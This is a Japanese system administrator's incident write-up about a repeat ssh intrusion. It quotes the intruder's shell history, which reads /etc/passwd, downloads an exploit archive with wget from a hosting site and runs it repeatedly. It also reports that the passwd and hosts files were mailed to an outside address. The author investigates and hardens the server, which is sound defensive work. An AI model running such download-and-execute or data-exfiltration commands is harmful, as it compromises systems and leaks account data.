今度は違うアカウントで侵入してきた。orz
以前と同じようにsshで、さも知ってるアカウントのようにログインしてきた。26分間も居座っている。その場で気づいたらtalk掛けてみたいものだ。
ac805068.ipt.aol.com Tue Jan 23 05:30 - 05:56 (00:26)
このユーザのパスワードを再発行して、パスワードの変更のお願いを出さないとならない。
今回は、ホームディレクトリを持つユーザだったのでshellのヒストリファイルに実行したコマンドの履歴が残っていた。
ls
cd
ls
cd public_html/
ls
emacs index.html
ls -laF
emacs index.html
uname -a
ls -a
cd log
ls -a
cat /etc/passwd
wget geocities.com/paul981ro/a-exploit.tar.gz
uname -r
cat /etc/issue
chmod +x a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
exit
ウェブページのコンテンツフォルダに入ってindex.htmlをemacsで開いているが、タイムスタンプは変わっていないので改ざんしてないようだ。
その後ウェブのアクセスログが収められているlogフォルダに移動している。
パスワードファイルを眺めた。おそらく新しいアカウント情報を得るためだろう。
ウェブからa-exploit.tar.gzをローカルにコピーした。
実行属性を立てて実行した。
調べてみるとa-exploit.tar.gzという名前のプロセスが動いているではないですか。即座にkillする。
exploitという名前から察するに、セキュリティホールを利用したアタックを掛けるもののようだ。
ネットワークトラフィックを見たところ、目視した感じでは目立ったトラフィックの増大はないようだ。どこかに迷惑をかけてなければ良いけど。
また、maillogには、このアカウントユーザからyouareinusa@gmail.com宛にメールが発信されていたログが残っていた。おそらく起動されていたプロセスが発信したのだろう。
しかし、間抜けな事にyouareinusa@gmail.comはUser Unknownで、エラーメールがこのアカウント宛に戻ってきていた。ちなみにこのアカウントのメールは使用されていない。
エラーで戻ってきたメールの内容を見ると、メールにはpasswdファイル、hostsファイル、www.yahoo-ht2.akadns.netへのpingの結果、uname -aの結果が収められていた。
今回の侵入も以前と同じaolからのアクセスだ。同一犯の可能性が高い。今回のアカウント情報は前回侵入した時に得たアカウント情報をクラックして得た物だとしても、最初の侵入の際はどうしたんだろう。本当に気味が悪い。
passwdファイルを参照しているが、shadowファイルには触れていない。ユーザアカウントの一覧とshellアカウントの有無は得られるが、パスワード(暗号化されているが)は要らないんだろうか。
とりあえずアカウント設定を見直してshellが不要なユーザからは、ログインシェルを外した。sshもメンテナンス用に開けていたが滅多に使わないのでサービスを停止した。外部からのメンテには、特定のホストからのtelnetログインだけ許可しておく事にした。
最初の侵入に至ったヒントはどこから漏れたんだろう。とても気になる。